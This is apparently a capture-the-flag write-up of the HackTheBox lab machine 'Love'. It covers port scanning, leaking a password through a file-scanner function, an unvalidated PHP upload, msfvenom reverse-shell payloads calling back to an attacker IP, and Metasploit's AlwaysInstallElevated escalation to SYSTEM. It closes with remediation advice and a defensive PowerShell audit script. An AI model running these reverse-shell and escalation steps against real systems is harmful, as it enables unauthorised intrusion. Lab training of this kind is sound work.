Love 10.10.10.239
You could claim that anything's real if the only basis for believing in it is that nobody's proved it doesn't exist! <J.K. Rowling>
Completed on 30 May 2021

Background

Love is a Windows machine from HackTheBox that focuses on enumeration, for training ethical hacking and penetration testing skills.
One of the system functions allows the hacker to read the content of files on the provided website, from which I obtained a system login credential with administrative rights. After logging in to the application, the file upload function does not enforce any input validation, so an exploitable script file can be uploaded to the server and run to obtain the initial foothold.
No anti-virus software is installed on this Windows machine, so I could run the privilege escalation script without restriction and found an AlwaysInstallElevated loophole. Administrative rights were obtained and the secure flag read.
Target Machine: 10.10.10.239
Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

1. nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap
2. nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.239 -o nmap-result.txt
# Nmap 7.80 scan initiated Mon May 24 23:38:44 2021 as: nmap -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670, -sC -sV -o nmap-result.txt 10.10.10.239
Nmap scan report for staging.love.htb (10.10.10.239)
Host is up (0.36s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Secure file scanner
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2021-05-24T16:08:18+00:00; +26m29s from scanner time.
| tls-alpn:
|_ http/1.1
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h11m29s, deviation: 3h30m01s, median: 26m28s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-24T09:08:00-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-24T16:08:03
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 24 23:41:50 2021 -- 1 IP address (1 host up) scanned in 186.41 seconds
Enumeration strategies

According to the Nmap result, the target machine is a Windows 10 Pro PC, a standard PC with Apache Server installed. The interesting ports are the two Apache ports, 80 and 5000. Apache is the primary enumeration target.

Hacking Process Part 1 – Enumeration

Web Enumeration

According to the Nmap result, the host names below are added to the host table, pointing to the IP 10.10.10.239.
1. SSL cert: staging.love.htb
2. IIS host: www.love.htb
As no user ID was found, a brute-force attack on the Voting System login does not work. In addition, no product information or vulnerability was found on this website, so I moved on to staging.love.htb.
One of the functions provided by this website scans the content of a file at a supplied address. Access to outside hosts is restricted, but after several tries, submitting the localhost address with port 5000 (one of the open ports on the Apache server) returned a password.
Logging in to the website www.love.htb with this captured password failed. After reviewing the dirb result, another administrative page was found that accepts this password.
dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result

Hacking Process Part 2 – Initial Low Privilege Access

On review, this PHP website provides an upload function that accepts any kind of file without input validation, and the uploaded file is accessible at http://10.10.10.239/images/.
I uploaded a PHP file to help navigate the system. The user flag was found in a file saved on phoebe's desktop. A reverse shell executable was then prepared and uploaded to the server.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.12.3 LPORT=1234 -f exe -o fkclai.exe
A reverse TCP shell was obtained, and the user flag was read from the user's desktop.

Hacking Process Part 3 – Privilege Escalation

Privilege escalation (PE) enumeration in a Windows environment can use the tool winPEASx86.exe. WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts; the checks are explained at book.hacktricks.xyz.
The result shows that this Windows environment can be exploited through AlwaysInstallElevated. When this policy is set to 1 in both the HKLM and HKCU hives, Windows Installer runs any MSI package with SYSTEM privileges regardless of which user starts it, which allows a hacker to add the current login user to the administrative group.

Exploit using Metasploit Framework

Prepared a reverse shell executable and uploaded it to the server.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe -o msf-fkclai.exe
Started msfconsole and set the payload to windows/meterpreter/reverse_tcp.
Executed the uploaded file to obtain the low-privilege shell (session 1).
Used the module exploit/windows/local/always_install_elevated and set the following parameters.
msf5> use exploit/windows/local/always_install_elevated
msf5 exploit(always_install_elevated) > set session 1
msf5 exploit(always_install_elevated) > set LHOST 10.10.14.3
msf5 exploit(always_install_elevated) > set LPORT 1234
msf5 exploit(always_install_elevated) > exploit
The exploit succeeded and returned a shell with administrative privileges.

Post Exploitation

Hostname: Love
ProductName: Windows 10 Enterprise
EditionID: Enterprise
ReleaseId: 2009
BuildBranch: vb_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: x86
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 5/30/2021 7:19:23 AM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB4601554, KB4562830, KB4570334, KB4577586, KB4580325, KB4586864, KB4589212, KB5000802, KB5000858,

Recommendation

Missing input validation is the main reason the initial foothold was possible: I could upload any kind of exploitable script and run it on the server. I suggest the following actions to improve security:
1. Restrict access to internal files, especially the file that contains the system password.
2. Improve input validation to reject any upload that is not an image file.
3. Harden the system to prevent any type of Windows privilege escalation.
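The following PowerShell script is an added example (not part of the original write-up or any tool it mentions) for the AlwaysInstallElevated finding above and recommendation 3: it audits both registry hives that Windows Installer consults and, with -Fix, resets the value to the secure default. The registry paths and value name are the standard Windows policy locations; the -Fix switch and its messages are this script's own.

```powershell
# Added example: audit (and optionally remediate) the AlwaysInstallElevated policy.
# Windows Installer only elevates MSI installs when the value is 1 in BOTH hives,
# so a finding requires both keys to be set. Writing HKLM needs an elevated shell.
param([switch]$Fix)

$hives = [ordered]@{
    'HKLM' = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    'HKCU' = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

$state = @{}
foreach ($name in $hives.Keys) {
    $path = $hives[$name]
    # The key or value is absent on a default install; treat absence as 0 (off).
    $item = Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
    $state[$name] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { 0 }
    Write-Host ("{0}: AlwaysInstallElevated = {1}" -f $name, $state[$name])
}

if ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1) {
    Write-Warning 'VULNERABLE: any user can install an MSI package with SYSTEM privileges.'
    if ($Fix) {
        foreach ($path in $hives.Values) {
            if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
            # 0 is the secure default; deleting the value entirely is equivalent.
            Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
        Write-Host 'Remediated: AlwaysInstallElevated set to 0 in both hives.'
    }
} else {
    Write-Host 'Not vulnerable: the policy is not enabled in both hives.'
}
```

Run it without -Fix first to record the current state; the audit half works from a standard user context, which is also the context an attacker would be checking from.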

Reference Links

Windows Privilege Escalation (AlwaysInstallElevated)
Hacking Articles